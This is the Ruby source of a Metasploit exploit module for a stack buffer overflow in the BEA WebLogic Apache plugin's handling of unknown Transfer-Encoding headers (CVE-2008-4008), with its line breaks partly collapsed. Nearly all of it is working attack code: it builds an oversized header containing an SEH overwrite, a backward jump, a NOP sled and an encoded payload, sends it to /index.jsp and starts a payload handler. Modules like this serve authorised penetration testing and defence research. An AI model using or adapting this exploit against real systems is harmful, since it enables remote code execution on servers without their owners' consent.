### $Id: bea_weblogic_transfer_encoding.rb 9744 2010-07-08 23:34:50Z jduck $##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/##require'msf/core'classMetasploit3<Msf::Exploit::RemoteRank=GreatRankingHttpFingerprint={:pattern=>[/Apache/]}
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Sehdefinitialize(info ={})super(update_info(info,'Name'=>'BEA Weblogic Transfer-Encoding Buffer Overflow','Description'=>%q{
This module exploits a stack based buffer overflow in the BEA
Weblogic Apache plugin. This vulnerability exists in the
error reporting for unknown Transfer-Encoding headers.
You may have to run this twice due to timing issues with handlers.
},'Author'=>'pusscat','Version'=>'$Revision: 9744 $','References'=>[['CVE','2008-4008'],['OSVDB','49283'],['URL','http://support.bea.com/application_content/product_portlets/securityadvisories/2806.html'],],'DefaultOptions'=>{'EXITFUNC'=>'seh',},'Privileged'=>true,'Platform'=>'win','Payload'=>{'Space'=>500,'BadChars'=>"\x00\x0d\x0a",'StackAdjustment'=>-1500,},'Targets'=>[['Windows Apache 2.2 version Universal',{'Ret'=>0x1001f4d6,#pop/pop/ret}],],'DisclosureDate'=>'Sept 09 2008','DefaultTarget'=>0))enddef exploit
sploit =rand_text_alphanumeric(5800)
sploit[5781,8]=generate_seh_record(target.ret)# Jump backward to the payload
sploit[5789,5]="\xe9\x5e\xe9\xff\xff"
sploit[0, payload.encoded.length+7]=make_nops(7)+ payload.encoded
datastore['VHOST']='localhost'send_request_cgi({'method'=>'POST','url'=>'/index.jsp','data'=>'','headers'=>{'Transfer-Encoding'=> sploit
}})
handler
endend